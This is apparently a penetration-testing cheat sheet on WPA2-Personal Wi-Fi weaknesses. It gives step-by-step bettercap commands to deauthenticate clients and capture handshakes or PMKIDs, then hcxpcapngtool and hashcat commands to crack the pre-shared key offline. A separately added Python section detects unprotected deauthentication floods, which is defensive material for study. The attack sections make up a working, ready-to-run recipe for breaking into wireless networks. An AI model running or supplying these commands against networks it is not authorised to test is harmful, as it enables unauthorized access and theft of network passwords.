WiFi - WPA2 (Personal)

  • Authentication: PSK (4-way handshake)
  • Cipher: CCMP/AES (avoid TKIP/mixed modes)

Vulnerabilities

Offline bruteforce

  • Capture 4-way handshake
    • Listen for clients to connect to the WiFi AP and capture the 4-way handshake.
    • Trigger/spoof deauthentication to force clients to reconnect to the AP.
      • Does not work if PMF (802.11w) is enabled/required, because deauthentication frames are then authenticated and spoofed ones are dropped.
  • EAPOL capture
    • Vulnerable routers include the PMKID in the first EAPOL frame they send to an associating client. The PMKID can be cracked offline to recover the PSK.
    • Works on WPA and WPA2 with PMKID roaming features enabled.
    • Listen to traffic in monitor mode
  • FT (802.11r) handshake capture.
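Added example, not part of the original cheat sheet: a small detector for the forced-reconnect step above. It parses raw 802.11 management frames, ignores deauth/disassoc frames that carry the Protected Frame bit (what PMF gives you), and alerts on any source MAC that sends a burst of unprotected ones. The frames, MAC addresses, timestamps and thresholds are constructed for the demo.

```python
import struct
from collections import defaultdict

# 802.11 frame control byte 0: version(2) | type(2) | subtype(4); byte 1: flags.
TYPE_MGMT, SUBTYPE_DEAUTH, SUBTYPE_DISASSOC = 0, 0x0C, 0x0A
FLAG_PROTECTED = 0x40          # set on unicast robust mgmt frames when PMF is in use
MGMT_HDR_LEN = 24              # FC(2) dur(2) addr1(6) addr2(6) addr3(6) seqctl(2)

def parse_mgmt(frame):
    """Return (subtype, src, protected, reason) for a mgmt frame with a body, else None."""
    if len(frame) < MGMT_HDR_LEN + 2 or ((frame[0] >> 2) & 0x3) != TYPE_MGMT:
        return None
    subtype = (frame[0] >> 4) & 0xF
    src = ":".join(f"{b:02x}" for b in frame[10:16])          # addr2 = transmitter
    reason = struct.unpack_from("<H", frame, MGMT_HDR_LEN)[0]
    return subtype, src, bool(frame[1] & FLAG_PROTECTED), reason

def detect_deauth_flood(frames, window=1.0, threshold=10):
    """frames: iterable of (timestamp_s, raw_bytes). Returns {src: peak_count} for
    every source that sent >= threshold unprotected deauth/disassoc frames inside
    any `window`-second interval (a PMF-protected deauth does not count)."""
    times_by_src = defaultdict(list)
    for ts, raw in frames:
        parsed = parse_mgmt(raw)
        if parsed and parsed[0] in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC) and not parsed[2]:
            times_by_src[parsed[1]].append(ts)
    alerts = {}
    for src, times in times_by_src.items():
        times.sort()
        lo, peak = 0, 0
        for hi, t in enumerate(times):          # sliding window over sorted timestamps
            while t - times[lo] > window:
                lo += 1
            peak = max(peak, hi - lo + 1)
        if peak >= threshold:
            alerts[src] = peak
    return alerts

def sample_deauth_frame(dst, src, bssid, reason=7, protected=False):
    """Constructed test input only: a deauthentication frame with a 2-byte reason code."""
    fc = bytes([(SUBTYPE_DEAUTH << 4) | (TYPE_MGMT << 2), FLAG_PROTECTED if protected else 0])
    return (fc + b"\x00\x00" + bytes.fromhex(dst) + bytes.fromhex(src)
            + bytes.fromhex(bssid) + b"\x00\x00" + struct.pack("<H", reason))

# Constructed sample: one AP/client pair (locally administered MACs) plus a spoofed burst.
AP, CLIENT = "020000000001", "020000000002"
SAMPLE = [(60.0 * i, sample_deauth_frame(CLIENT, AP, AP, reason=3)) for i in range(3)]  # normal
SAMPLE += [(100.0 + 0.05 * i, sample_deauth_frame(CLIENT, AP, AP)) for i in range(15)]  # burst
SAMPLE += [(200.0, sample_deauth_frame(CLIENT, AP, AP, protected=True))]                # PMF
```

Run it over frames pulled from a monitor-mode capture (Radiotap header stripped) and tune `window`/`threshold` to the roaming behaviour of your own network.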

4-way handshake capture w/ deauth

bettercap

Basic Usage

Sort APs by number of connected clients.
set wifi.show.sort clients desc
Choose which AP to attack and switch to its channel number.
wifi.recon.channel <ap_channel_#>
Choose a client of the AP and deauthenticate it.
wifi.deauth e0:xx:xx:xx:xx:xx

If successful, bettercap will output [wifi.client.handshake] captured... messages. Convert the captured pcap into a hash file for hashcat to crack.

Convert client handshake pcap file to a hashcat hash file (mode 22000 format; hcxpcapngtool writes it with -o)
./hcxpcapngtool -o bettercap-wifi-handshakes.22000 /root/bettercap-wifi-handshakes.pcap
Cracking the handshake with hashcat (hash file comes before the wordlist)
hashcat -a 0 -m 22000 -r rules/best64.rule bettercap-wifi-handshakes.22000 wordlist.txt

EAPOL Capture

https://hashcat.net/forum/thread-7717.html

bettercap

Basic Usage

Send association requests to all APs on the current channel to obtain their PMKIDs
wifi.assoc all

If successful, bettercap will output [wifi.client.handshake] captured... messages. Convert the captured pcap into a hash file for hashcat to crack.

Convert the PMKID pcap file to a hashcat hash file (same mode 22000 format; -z belongs to the older hcxpcaptool)
./hcxpcapngtool -o bettercap-wifi-handshakes.22000 /root/bettercap-wifi-handshakes.pcap
Cracking the PMKID with hashcat (hash file comes before the wordlist)
hashcat -a 0 -m 22000 -r rules/best64.rule bettercap-wifi-handshakes.22000 wordlist.txt